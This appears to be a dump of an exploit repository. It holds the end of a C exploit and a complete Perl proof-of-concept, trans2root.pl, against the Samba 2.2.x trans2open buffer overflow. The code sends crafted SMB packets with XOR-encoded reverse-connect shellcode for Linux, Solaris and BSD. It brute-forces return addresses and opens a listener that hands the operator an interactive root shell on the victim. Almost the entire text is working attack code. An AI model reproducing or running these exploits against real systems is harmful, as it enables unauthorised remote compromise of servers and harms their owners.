649 | fprintf(stdout, "Os type out of list!\n");
650 | exit(1);
651 | }
652 |
653 | he = gethostbyname(argv[2]);
654 |
655 | if (he == NULL) {
656 | fprintf(stderr, "Unable to resolve\n");
657 | return -1;
658 | }
659 |
660 | listen_pid = getpid();
661 | start_listen();
662 | exploit_pid = listen_pid + 1;
663 |
664 | //fprintf(stdout, "[+] Listen pid: %d, exploit pid: %d\n", listen_pid,exploit_pid);
665 |
666 | sscanf(argv[3], "%d.%d.%d.%d", &ip1, &ip2, &ip3, &ip4);
667 | linux_connect_back[171] = ip1; bsd_connect_back[162] = ip1;
668 | linux_connect_back[172] = ip2; bsd_connect_back[163] = ip2;
669 | linux_connect_back[173] = ip3; bsd_connect_back[164] = ip3;
670 | linux_connect_back[174] = ip4; bsd_connect_back[165] = ip4;
671 |
672 | fprintf(stdout, "[+] Connecting back to: [%d.%d.%d.%d:%d]\n",
673 | ip1, ip2, ip3, ip4, port_listen);
674 |
675 | a_port = htons(port_listen);
676 |
677 | linux_connect_back[177]= (a_port) & 0xff;
678 | linux_connect_back[178]= (a_port >> 8) & 0xff;
679 | bsd_connect_back[168]= (a_port) & 0xff;
680 | bsd_connect_back[169]= (a_port >> 8) & 0xff;
681 |
682 | switch(typeos) {
683 | case 0:
684 | desc = "Linux";
685 | ret = 0xc0000000;
686 | shellcode = linux_connect_back;
687 | break;
688 | case 1:
689 | desc = "FreeBSD/NetBSD";
690 | ret = 0xbfc00000;
691 | shellcode = bsd_connect_back;
692 | break;
693 | case 2:
694 | desc = "OpenBSD 3.1 and prior";
695 | ret = 0xdfc00000;
696 | shellcode = bsd_connect_back;
697 | break;
698 | case 3:
699 | desc = "OpenBSD 3.2 non-exec stack";
700 | ret = 0x00170000;
701 | shellcode = bsd_connect_back;
702 | break;
703 | }
704 |
705 | fprintf(stdout, "[+] Target: %s\n", desc);
706 | memcpy(&addr1.sin_addr, he->h_addr, he->h_length);
707 |
708 | addr1.sin_family = AF_INET;
709 | addr1.sin_port = htons(port);
710 |
711 | fprintf(stdout, "[+] Connected to [%s:%d]\n", (char *)inet_ntoa(addr1.sin_addr), port);
712 | fprintf(stdout, "[+] Please wait in seconds...!\n");
713 |
714 | signal(SIGUSR2, GoAway);
715 |
716 | for (i = 0; i < 50; i++) childs[i] = -1;
717 | i = 0; m = 0;
718 |
719 | while (LOOP) {
720 |
721 | if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) {
722 | fprintf(stderr, "[+] socket() error.\n");
723 | exit(-1);
724 | }
725 |
726 | ret -= STEPS; i++;
727 | if ((ret & 0xff) == 0x00 && typeos != 3) ret++;
728 |
729 | m++;
730 | //fflush(0);
731 | //fprintf(stdout, "[+] Return Address: 0x%08x [%02d]\n", (unsigned int)ret, m);
732 |
733 | usleep(150000);
734 |
735 | switch (childs[i] = fork()) {
736 | case 0:
737 | if (connect(sock, (struct sockaddr *)&addr1, sizeof(addr1)) == -1) {
738 | //fprintf(stderr, "[+] connect() error.\n");
739 | close(sock);
740 | exit(-1);
741 | }
742 |
743 | start_session(sock);
744 | sleep(3);
745 |
746 | if (typeos != 3) {
747 | if (exploit_normal(sock, ret, shellcode) < 0) {
748 | //fprintf(stderr, " -> Failed.\n");
749 | close(sock);
750 | exit(-1);
751 | }
752 | } else {
753 | if (exploit_openbsd32(sock, ret, shellcode) < 0) {
754 | //fprintf(stderr, " -> Failed.\n");
755 | close(sock);
756 | exit(-1);
757 | }
758 | }
759 | sleep(5);
760 | close(sock);
761 | exit(0);
762 | break;
763 | case -1:
764 | exit(-1);
765 | break;
766 | default:
767 | if (i > MAX_CHILDS - 2) {
768 | wait(&status);
769 | i--;
770 | }
771 | break;
772 | }
773 |
774 | if (m == ENDLOOP) LOOP = 0;
775 | }
776 |
777 | if (stat(".ROOT", &st) != -1)
778 | kill(SIGUSR2, listen_pid);
779 | else {
780 | fprintf(stdout, "[+] Dohh, exploit failed.\n");
781 | close(client); close(sock_listen);
782 | kill(listen_pid, SIGUSR2);
783 | sleep(2);
784 | exit(0);
785 | }
786 | }
787 |
--------------------------------------------------------------------------------
/xpl/trans2open.pl:
--------------------------------------------------------------------------------
1 | #!/usr/bin/perl
2 | ###############
3 |
4 | ##[ Header
5 | # Name: trans2root.pl
6 | # Purpose: Proof of concept exploit for Samba 2.2.x (trans2open overflow)
7 | # Author: H D Moore
8 | # Copyright: Copyright (C) 2003 Digital Defense Inc.
9 | # trans2root.pl -t -H -h
10 | ##
11 |
12 | use strict;
13 | use Socket;
14 | use IO::Socket;
15 | use IO::Select;
16 | use POSIX;
17 | use Getopt::Std;
18 |
19 | $SIG{USR2} = \&GoAway;
20 |
21 | my %args;
22 | my %targets =
23 | (
24 | "linx86" => [0xbffff3ff, 0xbfffffff, 0xbf000000, 512, \&CreateBuffer_linx86],
25 | "solx86" => [0x08047404, 0x08047ffc, 0x08010101, 512, \&CreateBuffer_solx86],
26 | "fbsdx86" => [0xbfbfefff, 0xbfbfffff, 0xbf000000, 512, \&CreateBuffer_bsdx86],
27 | # name # default # start # end # step # function
28 | );
29 |
30 | getopt('t:M:h:p:r:H:P:', \%args);
31 |
32 | my $target_type = $args{t} || Usage();
33 | my $target_host = $args{h} || Usage();
34 | my $local_host = $args{H} || Usage();
35 | my $local_port = $args{P} || 1981;
36 | my $target_port = $args{p} || 139;
37 |
38 | my $target_mode = "brute";
39 |
40 | if (! exists($targets{$target_type})) { Usage(); }
41 | print "[*] Using target type: $target_type\n";
42 |
43 | # allow single mode via the -M option
44 | if ($args{M} && uc($args{M}) eq "S")
45 | {
46 | $target_mode = "single";
47 | }
48 |
49 | # the parent process listens for an incoming connection
50 | # the child process handles the actual exploitation
51 | my $listen_pid = $$;
52 | my $exploit_pid = StartListener($local_port);
53 |
54 | # get the default return address for single mode
55 | my $targ_ret = $args{r} || $targets{$target_type}->[0];
56 | my $curr_ret;
57 | $targ_ret = eval($targ_ret);
58 |
59 | if ($target_mode !~ /brute|single/)
60 | {
61 | print "[*] Invalid attack mode: $target_mode (single or brute only)\n";
62 | exit(0);
63 | }
64 |
65 |
66 | if ($target_mode eq "single")
67 | {
68 | $curr_ret = $targ_ret;
69 | if(! $targ_ret)
70 | {
71 | print "[*] Invalid return address specified!\n";
72 | kill("USR2", $listen_pid);
73 | exit(0);
74 | }
75 |
76 | print "[*] Starting single shot mode...\n";
77 | printf ("[*] Using return address of 0x%.8x\n", $targ_ret);
78 | my $buf = $targets{$target_type}->[4]->($local_host, $local_port, $targ_ret);
79 | my $ret = AttemptExploit($target_host, $target_port, $buf);
80 |
81 | sleep(2);
82 | kill("USR2", $listen_pid);
83 | exit(0);
84 | }
85 |
86 |
87 | if ($target_mode eq "brute")
88 | {
89 | print "[*] Starting brute force mode...\n";
90 |
91 | for (
92 | $curr_ret =$targets{$target_type}->[1];
93 | $curr_ret >= $targets{$target_type}->[2];
94 | $curr_ret -=$targets{$target_type}->[3]
95 | )
96 | {
97 | select(STDOUT); $|++;
98 | my $buf = $targets{$target_type}->[4]->($local_host, $local_port, $curr_ret);
99 | printf (" \r[*] Return Address: 0x%.8x", $curr_ret);
100 | my $ret = AttemptExploit($target_host, $target_port, $buf);
101 | }
102 | sleep(2);
103 | kill("USR2", $listen_pid);
104 | exit(0);
105 | }
106 |
107 | sub Usage {
108 |
109 | print STDERR "\n";
110 | print STDERR " trans2root.pl - Samba 2.2.x 'trans2open()' Remote Exploit\n";
111 | print STDERR "===================================\n\n";
112 | print STDERR " Usage: \n";
113 | print STDERR " $0 -t -H -h \n";
114 | print STDERR " Options: \n";
115 | print STDERR " -M (S|B) \n";
116 | print STDERR " -r \n";
117 | print STDERR " -p \n";
118 | print STDERR " -P \n";
119 | print STDERR " Targets:\n";
120 | foreach my $type (keys(%targets))
121 | {
122 | print STDERR " $type\n";
123 | }
124 | print STDERR "\n";
125 |
126 |
127 | exit(1);
128 | }
129 |
130 |
131 | sub StartListener {
132 | my ($local_port) = @_;
133 | my $listen_pid = $$;
134 |
135 | my $s = IO::Socket::INET->new (
136 | Proto => "tcp",
137 | LocalPort => $local_port,
138 | Type => SOCK_STREAM,
139 | Listen => 3,
140 | ReuseAddr => 1
141 | );
142 |
143 | if (! $s)
144 | {
145 | print "[*] Could not start listener: $!\n";
146 | exit(0);
147 | }
148 |
149 | print "[*] Listener started on port $local_port\n";
150 |
151 | my $exploit_pid = fork();
152 | if ($exploit_pid)
153 | {
154 | my $victim;
155 | $SIG{USR2} = \&GoAway;
156 |
157 | while ($victim = $s->accept())
158 | {
159 | kill("USR2", $exploit_pid);
160 | print STDOUT "\n[*] Starting Shell " . $victim->peerhost . ":" . $victim->peerport . "\n\n";
161 | StartShell($victim);
162 | }
163 | exit(0);
164 | }
165 | return ($exploit_pid);
166 | }
167 |
168 | sub StartShell {
169 | my ($client) = @_;
170 | my $sel = IO::Select->new();
171 |
172 | Unblock(*STDIN);
173 | Unblock(*STDOUT);
174 | Unblock($client);
175 |
176 | select($client); $|++;
177 | select(STDIN); $|++;
178 | select(STDOUT); $|++;
179 |
180 | $sel->add($client);
181 | $sel->add(*STDIN);
182 |
183 | print $client "echo \\-\\-\\=\\[ Welcome to `hostname` \\(`id`\\)\n";
184 | print $client "echo \n";
185 |
186 | while (fileno($client))
187 | {
188 | my $fd;
189 | my @fds = $sel->can_read(0.2);
190 |
191 | foreach $fd (@fds)
192 | {
193 | my @in = <$fd>;
194 |
195 | if(! scalar(@in)) { next; }
196 |
197 | if (! $fd || ! $client)
198 | {
199 | print "[*] Closing connection.\n";
200 | close($client);
201 | exit(0);
202 | }
203 |
204 | if ($fd eq $client)
205 | {
206 | print STDOUT join("", @in);
207 | } else {
208 | print $client join("", @in);
209 | }
210 | }
211 | }
212 | close ($client);
213 | }
214 |
215 | sub AttemptExploit {
216 | my ($Host, $Port, $Exploit) = @_;
217 | my $res;
218 |
219 | my $s = IO::Socket::INET->new(PeerAddr => $Host, PeerPort => $Port, Type
220 | => SOCK_STREAM, Protocol => "tcp");
221 |
222 | if (! $s)
223 | {
224 | print "\n[*] Error: could not connect: $!\n";
225 | kill("USR2", $listen_pid);
226 | exit(0);
227 | }
228 |
229 | select($s); $|++;
230 | select(STDOUT); $|++;
231 | Unblock($s);
232 |
233 | my $SetupSession =
234 | "\x00\x00\x00\x2e\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x08".
235 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
236 | "\x00\x00\x00\x00\x00\x00\x00\xff\x00\x00\x00\x00\x20\x02\x00\x01".
237 | "\x00\x00\x00\x00";
238 |
239 | my $TreeConnect =
240 | "\x00\x00\x00\x3c\xff\x53\x4d\x42\x70\x00\x00\x00\x00\x00".
241 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x64\x00".
242 | "\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x5c\x5c\x69\x70\x63\x24".
243 | "\x25\x6e\x6f\x62\x6f\x64\x79\x00\x00\x00\x00\x00\x00\x00\x49\x50".
244 | "\x43\x24";
245 |
246 | my $Flush = ("\x00" x 808);
247 |
248 | print $s $SetupSession;
249 | $res = ReadResponse($s);
250 |
251 | print $s $TreeConnect;
252 | $res = ReadResponse($s);
253 |
254 | # uncomment this for diagnostics
255 | #print "[*] Press Enter to Continue...\n";
256 | #$res = ;
257 |
258 | #print "[*] Sending Exploit Buffer...\n";
259 |
260 | print $s $Exploit;
261 | print $s $Flush;
262 |
263 | ReadResponse($s);
264 | close($s);
265 | }
266 |
267 | sub CreateBuffer_linx86 {
268 | my ($Host, $Port, $Return) = @_;
269 |
270 | my $RetAddr = eval($Return);
271 | $RetAddr = pack("l", $RetAddr);
272 |
273 | my ($a1, $a2, $a3, $a4) = split(//, gethostbyname($Host));
274 | $a1 = chr(ord($a1) ^ 0x93);
275 | $a2 = chr(ord($a2) ^ 0x93);
276 | $a3 = chr(ord($a3) ^ 0x93);
277 | $a4 = chr(ord($a4) ^ 0x93);
278 |
279 | my ($p1, $p2) = split(//, reverse(pack("s", $Port)));
280 | $p1 = chr(ord($p1) ^ 0x93);
281 | $p2 = chr(ord($p2) ^ 0x93);
282 |
283 | my $exploit =
284 | # trigger the trans2open overflow
285 | "\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00".
286 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00".
287 | "\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00".
288 | "\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01".
289 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
290 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90".
291 |
292 | GetNops(772) .
293 |
294 | # xor decoder courtesy of hsj
295 | "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01".
296 | "\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30".
297 | "\x93\x40\xe2\xfa".
298 |
299 | # reverse-connect, mangled lamagra code + fixes
300 | "\x1a\x76\xa2\x41\x21\xf5\x1a\x43\xa2\x5a\x1a\x58\xd0\x1a\xce\x6b".
301 | "\xd0\x1a\xce\x67\xd8\x1a\xde\x6f\x1e\xde\x67\x5e\x13\xa2\x5a\x1a".
302 | "\xd6\x67\xd0\xf5\x1a\xce\x7f\xf5\x54\xd6\x7d".
303 | $p1.$p2 ."\x54\xd6\x63". $a1.$a2.$a3.$a4.
304 | "\x1e\xd6\x7f\x1a\xd6\x6b\x55\xd6\x6f\x83\x1a\x43\xd0\x1e\xde\x67".
305 | "\x5e\x13\xa2\x5a\x03\x18\xce\x67\xa2\x53\xbe\x52\x6c\x6c\x6c\x5e".
306 | "\x13\xd2\xa2\x41\x12\x79\x6e\x6c\x6c\x6c\xaa\x42\xe6\x79\x78\x8b".
307 | "\xcd\x1a\xe6\x9b\xa2\x53\x1b\xd5\x94\x1a\xd6\x9f\x23\x98\x1a\x60".
308 | "\x1e\xde\x9b\x1e\xc6\x9f\x5e\x13\x7b\x70\x6c\x6c\x6c\xbc\xf1\xfa".
309 | "\xfd\xbc\xe0\xfb".
310 |
311 | GetNops(87).
312 |
313 | ($RetAddr x 8).
314 |
315 | "DDI!". ("\x00" x 277);
316 |
317 | return $exploit;
318 | }
319 |
320 | sub CreateBuffer_solx86 {
321 | my ($Host, $Port, $Return) = @_;
322 |
323 | my $RetAddr = eval($Return);
324 | my $IckAddr = $RetAddr - 512;
325 |
326 | $RetAddr = pack("l", $RetAddr);
327 | $IckAddr = pack("l", $IckAddr);
328 |
329 | # IckAddr needs to point to a writable piece of memory
330 |
331 | my ($a1, $a2, $a3, $a4) = split(//, gethostbyname($Host));
332 | $a1 = chr(ord($a1) ^ 0x93);
333 | $a2 = chr(ord($a2) ^ 0x93);
334 | $a3 = chr(ord($a3) ^ 0x93);
335 | $a4 = chr(ord($a4) ^ 0x93);
336 |
337 | my ($p1, $p2) = split(//, reverse(pack("s", $Port)));
338 | $p1 = chr(ord($p1) ^ 0x93);
339 | $p2 = chr(ord($p2) ^ 0x93);
340 |
341 | my $exploit =
342 | # trigger the trans2open overflow
343 | "\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00".
344 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00".
345 | "\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00".
346 | "\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01".
347 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
348 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90".
349 |
350 | GetNops(813) .
351 |
352 | # xor decoder courtesy of hsj
353 | "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01".
354 | "\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30".
355 | "\x93\x40\xe2\xfa".
356 |
357 | # reverse-connect, code by bighawk
358 | "\x2b\x6c\x6b\x6c\xaf\x64\x43\xc3\xa2\x53\x23\x09\xc3\x1a\x76\xa2".
359 | "\x5a\xc2\xd2\xd2\xc2\xc2\x23\x75\x6c\x46\xa2\x41\x1a\x54\xfb".
360 | $a1.$a2.$a3.$a4 ."\xf5\xfb". $p1.$p2.
361 | "\xf5\xc2\x1a\x75\xf9\x83\xc5\xc4\x23\x78\x6c\x46\xa2\x41\x21\x9a".
362 | "\xc2\xc1\xc4\x23\xad\x6c\x46\xda\xea\x61\xc3\xfb\xbc\xbc\xe0\xfb".
363 | "\xfb\xbc\xf1\xfa\xfd\x1a\x70\xc3\xc0\x1a\x71\xc3\xc1\xc0\x23\xa8".
364 | "\x6c\x46".
365 |
366 | GetNops(87) .
367 |
368 | "010101".
369 | $RetAddr.
370 | $IckAddr.
371 | $RetAddr.
372 | $IckAddr.
373 | "101010".
374 |
375 | "DDI!". ("\x00" x 277);
376 |
377 | return $exploit;
378 | }
379 |
380 | sub CreateBuffer_bsdx86 {
381 | my ($Host, $Port, $Return) = @_;
382 |
383 | my $RetAddr = eval($Return);
384 | my $IckAddr = $RetAddr - 512;
385 |
386 | $RetAddr = pack("l", $RetAddr);
387 | $IckAddr = pack("l", $IckAddr);
388 |
389 | # IckAddr needs to point to a writable piece of memory
390 |
391 | my ($a1, $a2, $a3, $a4) = split(//, gethostbyname($Host));
392 | $a1 = chr(ord($a1) ^ 0x93);
393 | $a2 = chr(ord($a2) ^ 0x93);
394 | $a3 = chr(ord($a3) ^ 0x93);
395 | $a4 = chr(ord($a4) ^ 0x93);
396 |
397 | my ($p1, $p2) = split(//, reverse(pack("s", $Port)));
398 | $p1 = chr(ord($p1) ^ 0x93);
399 | $p2 = chr(ord($p2) ^ 0x93);
400 |
401 | my $exploit =
402 | # trigger the trans2open overflow
403 | "\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00".
404 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00".
405 | "\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00".
406 | "\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01".
407 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
408 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90".
409 |
410 | GetNops(830) .
411 |
412 | # xor decoder courtesy of hsj
413 | "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01".
414 | "\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30".
415 | "\x93\x40\xe2\xfa".
416 |
417 | # reverse-connect, code by bighawk
418 | "\xa2\x5a\x64\x72\xc2\xd2\xc2\xd2\xc2\xc2\x23\xf2\x5e\x13\x1a\x50".
419 | "\xfb". $a1.$a2.$a3.$a4 ."\xf5\xfb". $p1.$p2.
420 | "\xf5\xc2\x1a\x75\x21\x83\xc1\xc5\xc3\xc3\x23\xf1\x5e\x13\xd2\x23".
421 | "\xc9\xda\xc2\xc0\xc0\x5e\x13\xd2\x71\x66\xc2\xfb\xbc\xbc\xe0\xfb".
422 | "\xfb\xbc\xf1\xfa\xfd\x1a\x70\xc2\xc7\xc0\xc0\x23\xa8\x5e\x13".
423 |
424 | GetNops(87) .
425 |
426 | "010101".
427 | $RetAddr.
428 | $IckAddr.
429 | $RetAddr.
430 | $IckAddr.
431 | "101010".
432 |
433 | "DDI!". ("\x00" x 277);
434 |
435 | return $exploit;
436 | }
437 |
438 | sub Unblock {
439 | my $fd = shift;
440 | my $flags;
441 | $flags = fcntl($fd,F_GETFL,0) || die "Can't get flags for file handle: $!\n";
442 | fcntl($fd, F_SETFL, $flags|O_NONBLOCK) || die "Can't make handle nonblocking: $!\n";
443 | }
444 |
445 | sub GoAway {
446 | exit(0);
447 | }
448 |
449 | sub ReadResponse {
450 | my ($s) = @_;
451 | my $sel = IO::Select->new($s);
452 | my $res;
453 | my @fds = $sel->can_read(4);
454 | foreach (@fds) { $res .= <$s>; }
455 | return $res;
456 | }
457 |
458 | sub HexDump {
459 | my ($data) = @_;
460 | my @x = split(//, $data);
461 | my $cnt = 0;
462 |
463 | foreach my $h (@x)
464 | {
465 | if ($cnt > 16)
466 | {
467 | print "\n";
468 | $cnt = 0;
469 | }
470 |
471 | printf("\\x%.2x", ord($h));
472 | $cnt++;
473 | }
474 | print "\n";
475 | }
476 |
477 | # thank you k2 ;)
478 | sub GetNops {
479 | my ($cnt) = @_;
480 | my @nops = split(//,"\x99\x96\x97\x95\x93\x91\x90\x4d\x48\x47\x4f\x40\x41\x37\x3f\x97".
481 | "\x46\x4e\xf8\x92\xfc\x98\x27\x2f\x9f\xf9\x4a\x44\x42\x43\x49\x4b".
482 | "\xf5\x45\x4c");
483 | return join ("", @nops[ map { rand @nops } ( 1 .. $cnt )]);
484 | }
485 |
486 |
487 |
488 | # milw0rm.com [2003-04-07]
--------------------------------------------------------------------------------